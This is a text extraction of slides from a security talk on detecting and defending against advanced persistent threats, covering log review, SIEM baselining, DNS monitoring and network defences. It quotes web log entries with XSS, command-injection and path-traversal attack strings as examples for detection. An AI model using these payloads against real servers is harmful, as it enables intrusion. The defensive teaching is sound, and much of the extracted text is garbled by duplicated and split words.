– Apache – access_log, error_log
– IIS6 - %windir%\System32\LogFiles, IIS7 %SystemDrive%\inetpub\logs\LogFiles
• Looking at these logs will help you identify:
–
–
–
–
SQL IInjection
j ti attacks
tt k
XSS
Path Traversal
Etc.
150
10/10/2011
Web Traffic - XSS
• 217.160.165.173 [12/Mar/2004:22:31:12 0500] "GET
/foo.jsp?<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 200
578 “-” "Mozilla/4.75 [en] (X11, U; Nessus)“
• 217.160.165.173 [12/Mar/2004:22:37:17 0500] "GET
/cgibin/cvslog.cgi?file=<SCRIPT>window.alert</SCRI
PT> HTTP/1.1" 403 302 “-” "Mozilla/4.75 [en] (X11,
U; Nessus)“
• These represent XSS type attacks
Web Traffic - Injection
• 81.171.1.165 [13/Mar/2004:10:46:43 0500]
"HEAD
http://www.sweetgeorgia.com/cgibin/af.cgi?_b
rowser_out=|echo;id;exit| HTTP/1.0" 200 0
"http://www.sweetgeorgia.com/cgibin/af.cgi?_
browser_out=|echo;id;exit|" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)“
• Trying
y g to e
execute
ecute OS commands.
co
a ds The
e
variable '_browser_out' contains a pipe
symbol, followed by Unix system commands
('|echo;id;exit|').
151
10/10/2011
Web Traffic - Injection
• 66.138.147.49 [13/Mar/2004:13:33:06 0500] "GET
http://login.korea.yahoo.com/config/login?.redir_from
=PROFILES?.&login=&.tries=1&.src=jpg&.last=&pro
mo=&.intl=us&.bypass=&.partner=&.chkP=Y&.done=
http://jpager.yahoo.com/jpager/pager2.shtml&login=bl
ood`1234567890&passwd=password HTTP/1.0" 200
566 ""““
• Calling a login function. In its login name (parameter
'l i ') is
'login')
i a back
b k tick
i k symbol
b l ('bl
('blood`1234567890').
d`1234 6 890')
• This might be a simple brute force attack or a test
how the application handles the back tick symbol.
Web Traffic – Path Traversal
• 68.48.142.117 [09/Mar/2004:22:29:43 0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/+dir
HTTP/1.0” 200 566 “” "“
• The '%255c' is a double percent hex encoding. The
'%25’ resolves to a percent character ('%'), the
resulting '%5c’ resolves to a backslash ('\').
• The request tries to access the cmd.exe program, the
windows command shell to execute the 'dir’
command (list all files in a directory).
152
10/10/2011
Detecting APT
SECURITY INFORMATION
EVENT MANAGEMENT
Security Information Event Mgmt.
• Aka “SIEM”
• Reducing Security Information
“Overload”
Overload”
• Gathering, correlating,
aggregating, analyzing and
presenting information from
disparate systems
• Normally provides
dashboards, alerting, etc to
allow security analysts to
weight through the millions of
events in their organizations
• Some free tools – Splunk,
OSSEC, Snort
153
10/10/2011
Use of SIEM Products
• On their own, they are useless
• SIEM products do a great job at aggregating
and correlating traffic
• Without intelligence, a SIEM won't detect a
relentless targeted attack designed to avoid
raising any red flags
• They
They're
re normally tuned to catch unusual
activity, not stealthy attacks that hide behind
legitimate user credentials or normal traffic.
“A b
better SIEM with
i h faster
f
results
l and
d
operationalizing security data in a way
that closes that window and risk in a more
timely manner limits the amount of time
the attacker”
(Eddie Schwartz – CSO, RSA)
154
10/10/2011
Exception Monitoring
• A SIEM is designed to alert on events (the “E” in
SIEM)
• We have to focus on what traffic/activity is normal
= “Baseline” and then zero in on the exceptions
to this
• Organizations put lots of dollars buying SIEMS to
meet PCI-DSS compliance
• We have re-direct our SIEM to deal APT
non compliant
• We are not simply looking for non-compliant
systems based on a predetermined policy, we
are looking at modeling behavior and
understanding what is normal and what is not
Exception Monitoring – Example #1
• Say your SIEM logs physical access (through
yyour ID badge
g system)
y
)
• On Tuesday at 4:00pm you see Joe Smith
swipe his card exiting the HQ building
• On Tuesday at 4:02pm you see Joe Smith
login in to a server on the perimeter of your
network…
et o
• Correlation becomes very important!
155
10/10/2011
Exception Monitoring – Example #2
• Sally is a financial analyst who accesses
PeopleSoft, e-mail, billing system
• On Wednesday, logs show she has attempted to
access a Unix box running DNS for the
organization
• Sally, based on access correlation and
baselining, logs into the Active Directory between
8:30am and 8:39am M-F
• We have noted logins to the AD on Saturday and
Sunday at 1:31am, 6:02am, and 8:33pm.
• What does this tell us?
APT IN DEPTH
HOW DO I PROTECT MYSELF?
156
10/10/2011
What do I do?
1.
2
2.
3.
4.
Early warning
Protection
Remediation
Counter measures
Before you can protect yourself…
• You have to understand A/V is not going to
answer the following:
g
–
–
–
–
–
–
–
Who is targeting you?
What are they after?
Have the succeeded?
How long have they been succeeding?
What I have lost so far?
Who is patient zero?
How does this spread?
157
10/10/2011
Time to Update Your Inventory…
• Organizations have to start to better understand what
assets they have hanging out on the public Internet
• In many cases, organizations are hit because they
didn’t know about that “box in corner, under
someone’s desk, that has a NAT to the Internet”.
Inspect/Secure DNS
• Watching your DNS logs to see what users
are trying
y g to resolve
• Could lead you to understand whether or not
users are infected (C&C) or whether they are
going to be (phishing links)
• Are you allowing DNS resolution on name
servers
se
e s outs
outside
de you
your o
organization?
ga at o
• Split DNS
Split/split DNS
split/split/split
DNS
158
10/10/2011
Architect Your Network for Attack
• Expect that a breach will occur – architect based
on this
• Layer your security controls (router
perimeter
firewall proxy
host FW
host security)
• Although layering is important always remember
-- increased emphasis on protecting the data
itself.
• Increase the level of monitoring
g and intrusion
detection
• Honeypots can help
• The dreaded “ANY/ANY” (both ingress/egress)
Take Care of Your Web Apps
• Web applications remain the low-hanging fruit
for attackers.
• Yes, penetration testing is important - but
these measures perpetuate a whack-a-mole
security strategy that is neither manageable
nor sustainable
• Make
a e investments
est e ts in secure
secu e code review,
e e ,
securely configured Web server
environments, and vigilant monitoring of Web
activity.
159
10/10/2011
Take Care of Your Web Apps
• Monitor their logs – incorporate into your
SIEM
• Deploy and application proxy such as mod
proxy
– Screens and blocks common vulnerable requests (i.e.
SQL injection, XSS, etc)
– Advanced audit and logging functionality
– Layer
L
off obfuscation
bf
ti – your web
b app iis nott di
directly
tl on
the Internet
Geo-blocking….
• Block IP networks based on country location
• Can be ingress and/or egress
• For example, block all traffic from China,
Ukraine, etc.
• Usually done at a perimeter router level
• Not always easy - to block a country you first
must have the entire range of IP Addresses
that where assigned to that country – you
could block legitimate traffic!
160
10/10/2011
Watch Network Traffic
• Look at the possibility of a SIEM tool – allow for
aggregation and correlation (there are
commercial and open source flavors of this)
• Normalize your network traffic patterns – What is
normal and what is not (isolate what is not, and
investigate as possible attacks)
• Look at DLP as a potential solution
• Rootkits can hide on a system but network traffic
cannot be hidden
• Understand all traffic patterns and look for
anomalies
– If you have an IDS/IPS
make sure it is baselined
Watch Network Traffic
• Monitor cyber security events 24 x 7.
– Advanced p
persistent threats like those that hit
organizations are just that--persistent--and require
constant vigilance.
• Across federal government, agencies are
investing in "continuous monitoring," with a
goal of obtaining a near real-time view into
the status of computer system security
security.
161
10/10/2011
Protect the Endpoint
• Patch your systems – Un-patched Adobe
((Acrobat,, Flash),
), and Microsoft (Windows,
(
,
Office) are big reasons why machines are
infected
• Protect the endpoint
– Whitelisting technology?
block everything else.
we know what is good,
Test Your Systems
• Perform a risk assessment to understand
where to focus their p
protective systems
y
(important as cost may be prohibitive to
secure everything)
• Vulnerability management (i.e. scanning
system) to continually scan assets for
systems that may fall outside of compliance
(i.e. configuration, patches, etc)
162
10/10/2011
Proxy your Internet Traffic
•
•
•
•
As opposed to direct Internet via a NAT
Control and logging
Consider “honeypotting” for internal networks
You can use whitelisting/blacklisting
technologies as well (i.e. Web Sense, 8e6,
BlueCoat, etc.)
Response
• Have a proper Incident response process on
how to deal with these issues
• Remove devices from the network
immediately or monitor what the attackers are
doing
• Post event analysis is important as well
163
10/10/2011
Research
• Keep up to date on intelligence reports from
trusted security
y sources on what attacks you
y
need to look at for – many times specific
attack vectors can be found (i.e. C&C
connects to systems on port TCP/666)
Intelligence Feeds
•
•
•
•
•
Malwaredomainlist.com
Abuse ch
Abuse.ch
Spamcop.net
Team-cymru.net
Shadowserver.org
164
10/10/2011
Education
• Make sure your security team (or group
responsible for monitoring) knows what to
look for (i.e. education)
• Education – About spear-phishing, malware
sites, etc (what should they not click, not
plugging unknown USB sticks into their PCs,
etc) – get other groups that can be vocal for
you to ass
assist
st ((i.e.
e PR,, HR,, etc)
• Social engineering is a real threat – ensure
your organization is trained on how to deal
with this threat
Test your Organization
• Spear-phish a sample of your staff from a
crafted e-mail account
• Include a link to a website, log traffic
• Leave some candy in the lunchroom (i.e.
DVD, USB stick, etc) – think autorun.
• You will be surprised what you find!
165
10/10/2011
Control Systems
• If you are an organization that has sensitive
control systems (i.e. power utility)
• Next-generation automation and control systems
must be hardened and made resilient against the
same kinds of attacks we contend with on the
Internet.
• Traditional control system design assumptions
and security measures need to be reassessed as
embedded
b dd d d
devices
i
adopt
d t open, rather
th th
than
proprietary, standards, and as logical and even
physical separation from the Internet become
harder to assure
Purge legacy, minority technologies
• The Web server in the first attack was based
on a little-used technology
gy at the lab,, Adobe
ColdFusion.
• Such out-of-sight, out-of-mind technologies
are inherently vulnerable because they don't
get the same degree of attention as an
organization's primary platforms.
166
10/10/2011
On a closing note….
“Maintain a constant state of
Suspicious Alertness!”
Lieutenant Colonel Kazinski, Jarhead (2005)
Thank you!
Questions or Comments?
Peter Morin
902 229 6282
902-229-6282
[email protected]
http://www.twitter.com/@petermorin123
167

APT Hartford Oct12

Transcription

Similar documents

Indonesian Diaspora Network Southern California

UniPixel Investor Presentation November XX, 2015 NASDAQ: UNXL

Confidential SERVICE MANUAL

The Yankee Candle Company, Inc. High Yield - Corporate-ir

Towards a more cost-effective Recruitment solution

product - Deacero

Opportunities to solve the mass-hiring challenge

Casino XXX N95 ZGroup Mobile bydr Ade Lante

Application for Personal Accident Disability Insurance